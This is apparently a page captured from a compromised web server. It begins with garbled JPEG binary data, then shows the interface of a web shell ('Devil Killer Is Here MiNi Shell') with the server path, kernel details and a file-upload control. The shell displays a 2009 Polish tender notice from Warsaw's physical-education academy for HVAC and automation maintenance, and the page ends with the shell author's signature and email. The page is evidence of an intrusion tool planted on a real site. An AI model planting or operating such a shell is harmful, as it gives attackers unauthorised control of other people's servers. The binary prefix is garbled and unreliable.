JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090127/28961-N-2009.html

<p class="kh_header"><b>Warszawa: PROWADZENIE STAŁEJ KONSERWACJI I EKSPLOATACJI URZĄDZEŃ WENTYLACJI MECHANICZNEJ, AUTOMATYKI I KLIMATYZACJI NA TERENIE AKADEMII WYCHOWANIA FIZYCZNEGO JÓZEFA PIŁSUDSKIEGO W WARSZAWIE</b><br>
<b>Numer ogłoszenia: 28961 - 2009; data zamieszczenia: 27.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Wychowania Fizycznego Józefa Piłsudskiego , ul. Marymoncka 34, 00-968 Warszawa, woj. mazowieckie, tel. 834 05 14, faks 834 76 65.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> awf.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PROWADZENIE STAŁEJ KONSERWACJI I EKSPLOATACJI URZĄDZEŃ WENTYLACJI MECHANICZNEJ, AUTOMATYKI I KLIMATYZACJI NA TERENIE AKADEMII WYCHOWANIA FIZYCZNEGO JÓZEFA PIŁSUDSKIEGO W WARSZAWIE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest prowadzenie stałej konserwacji i eksploatacji urządzeń 	wentylacji mechanicznej, automatyki i klimatyzacji  w budynkach: basenu, auli głównej, 	hali gier, ośrodku rehabilitacji kompleksowej, hali l.a. oraz hali sportów walki na terenie 	Akademii Wychowania Fizycznego J. Piłsudskiego w Warszawie (CPV 50730000-1)
2. Szczegółowy zakres rzeczowy przedmiotu zamówienia określa Załącznik nr 1 do niniejszej 	Specyfikacji.
3. W ramach realizacji przedmiotu zamówienia czynności będą wykonywane poprzez 	codzienną obecność w godz. Od 8.00 do 16.00 tj. w okresie 8 godzinnego czasu pracy, a 	także w dni wolne od pracy oraz w soboty i niedziele na każde telefoniczne wezwanie 	Zamawiającego. W związku z tym norma czasu pracy wynosi 8 godz. przez 23 dni oraz 16 	godzin za dyżury sobotnio-niedzielne co łącznie stanowi 200 godz. miesięcznie dla 	hydraulika- ślusarza+ 60 godz. dla elektryka - automatyka, co stanowi razem 260 godz. 	miesięcznie.
4. W przypadku, gdy konieczność wymiany materiałów będzie dotyczyła urządzeń objętych 	usługą stanowiącą  przedmiot zamówienia koszty ponosi Zamawiający, jednakże zasadność 	ich użycia musi być potwierdzona stosownym protokołem konieczności obustronnie 	podpisanym.
5. Zakup materiałów/części zamiennych koniecznych do prawidłowego funkcjonowania 	urządzeń objętych usługą  będzie dokonywał Wykonawca po otrzymaniu pisemnego  	zlecenia od Zamawiającego. Do zakupionych na tej podstawie materiałów/części 	Wykonawca dołączy ich karty gwarancyjne.
6.	Materiały i urządzenia zastosowane do realizacji przedmiotu zamówienia muszą być oznakowane znakiem CE/ B, posiadać odpowiednie certyfikaty, być wolne od wad i usterek oraz spełniać standardy jakościowe wyrobów dopuszczonych do obrotu i stosowania w budownictwie, określonym w art. 10 ustawy PB.
7. Zamawiający zastrzega, ze Wykonawcy ubiegający się o udzielenie przedmiotowego 	zamówienia udzielą co najmniej 12 miesięcznej gwarancji  na wykonane prace licząc od 	daty obustronnego podpisania bezusterkowego protokołu odbioru końcowego, niezależnie 	od gwarancji na materiały użyte do realizacji przedmiotu zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 50.73.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
I.	Posiadają uprawnienia do wykonania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
W tym zakresie Zamawiający wymaga aby Wykonawcy:
a)	prowadzili zarejestrowaną działalność gospodarczą.

II.	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawiają pisemne zobowiązanie innych podmiotów do udostępniania potencjału technicznego i osób zdolnych do wykonania zamówienia.
W tym zakresie Zamawiający wymaga aby Wykonawcy: wykonali, a w przypadku świadczeń okresowych lub ciągłych również wykonywali, usługi w okresie 	ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie odpowiadającym swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że te usługi zostały wykonane należycie tj. wymagane jest wykazanie co najmniej jednej usługi odpowiadającej swoim 	rodzajem usłudze stanowiącej przedmiot zamówienia. Wartość wykazanej usługi nie 	może być mniejsza niż 90.000 zł. brutto.
	Zamawiający żąda złożenia dokumentów potwierdzających, ze usługi te zostały 	wykonane 	należycie. 
W przypadku podmiotów występujących wspólnie warunek ten podmioty mogą spełniać łącznie.

III.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie       
 zamówienia.

IV.	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia   
publicznego.

Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentu określonego w § 1 ust. 1 pkt 2, 3 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane - składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
-	nie otwarto jego likwidacji ani nie ogłoszono upadłości.
-	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne       i zdrowotne, albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,  
Dokumenty, o których mowa w § 2 ust. 1 pkt 1 lit. a powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w § 2 ust. 1 pkt 1 lit. b, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.  
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa  § 2 ust. 1 pkt 1 lit. a i b zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Przepis § 2 ust. 2 wymienionego rozporządzenia stosuje się odpowiednio.

Ocena spełniania warunków wymaganych od Wykonawcy dokonana będzie na podstawie dokumentów przedstawionych przez Wykonawcę w złożonej ofercie wg formuły spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Podpisane oświadczenie potwierdzające spełnienie warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych - wg wzoru stanowiącego załącznik  nr 3 do SIWZ
2.	W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonania określonej działalności lub czynności jeśli ustawy nakładają obowiązek posiadania takich uprawnień oraz nie podlega wykluczeniu z postępowania Zamawiający żąda złożenia:

a)	aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
	W przypadku podmiotów występujących wspólnie dokument ten musi przedłożyć 	każdy z podmiotów,
		b) złożenie aktualnych zaświadczeń właściwego naczelnika urzędu skarbowego  			oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy 				Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że 				Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na 				ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane  			prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub 			wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych 			nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
	W 	przypadku podmiotów występujących wspólnie dokumenty te musi    	przedłożyć każdy z podmiotów.

		W przypadku podmiotów występujących wspólnie dokumenty te musi przedłożyć    		każdy z podmiotów.

	3. W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie, 		należy sporządzić i dołączyć do oferty wykaz wykonanych, a w przypadku świadczeń 		okresowych lub ciągłych również wykonywanych, usług w okresie ostatnich 3 lat 		przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres 			prowadzenia działalności jest krótszy - w tym okresie odpowiadającym swoim 			rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich 		wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów 			potwierdzających, że te dostawy lub usługi zostały wykonane należycie, wymagane 		jest wykazanie co najmniej jednej usługi odpowiadającej swoim 	rodzajem usłudze 
		stanowiącej przedmiot zamówienia. Wartość wykazanej usługi nie może być mniejsza niż 90.000 zł. brutto. wg wzoru stanowiącego zł. nr 4 do SIWZ
	Zamawiający żąda złożenia dokumentów potwierdzających, ze usługi te zostały 	wykonane 	należycie. 
	W przypadku podmiotów występujących wspólnie warunek ten podmioty mogą 	spełniać łącznie.

	4. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium 	Rzeczypospolitej Polskiej zamiast dokumentu określonego w § 1 ust. 1 pkt 2, 3 	Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów 	dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te 	dokumenty mogą być składane - składa dokument lub dokumenty, wystawione w 	kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, 	że:
-		nie otwarto jego likwidacji ani nie ogłoszono upadłości.
-		nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne       i 	zdrowotne, albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub 	rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji 	właściwego organu,  
Dokumenty, o których mowa w § 2 ust. 1 pkt 1 lit. a powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w § 2 ust. 1 pkt 1 lit. b, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.  
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa  § 2 ust. 1 pkt 1 lit. a i b zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Przepis § 2 ust. 2 wymienionego rozporządzenia stosuje się odpowiednio.

Forma dokumentów:
Dokumenty należy złożyć w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę.
Zamawiający zażąda przedstawienia oryginału lub notarialne potwierdzonej kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości, co do jej prawdziwości.
W przypadku złożenia przez Wykonawcę dokumentów sporządzonych w języku obcym Zamawiający wymaga złożenia tłumaczenia na język polski poświadczonego przez Wykonawcę.

7.    Wykaz innych oświadczeń lub dokumentów jakie muszą dostarczyć Wykonawcy:
	podpisany szczegółowy opisu przedmiotu zamówienia stanowiący - załącznik nr 1 do SIWZ.
	wypełniony i podpisany formularz oferty, sporządzony według wzoru stanowiącego - załącznik nr  2 do SIWZ
	wypełnioną i podpisaną informację o zakresie dostaw powierzonych podwykonawcom według wzoru stanowiącego  - załącznik nr 5 (wypełnić i dołączyć do oferty tylko jeśli Wykonawca będzie korzystał z podwykonawców).
	podpisany wzór umowy - załącznik nr 6..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.awf.edu.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Akademia Wychowania Fizycznego Józefa Piłsudskiego w Warszawie
	Ul. Marymoncka 34,
	00-968 Warszawa	
Dział Zamówień Publicznych i Gospodarki Materiałowej, budynek administarcji - parter.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.02.2009 godzina 12:00, miejsce: Akademia Wychowania Fizycznego Józefa Piłsudskiego w Warszawie
	Ul. Marymoncka 34,
	00-968 Warszawa	
Dział Zamówień Publicznych i Gospodarki Materiałowej, budynek administarcji - parter.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com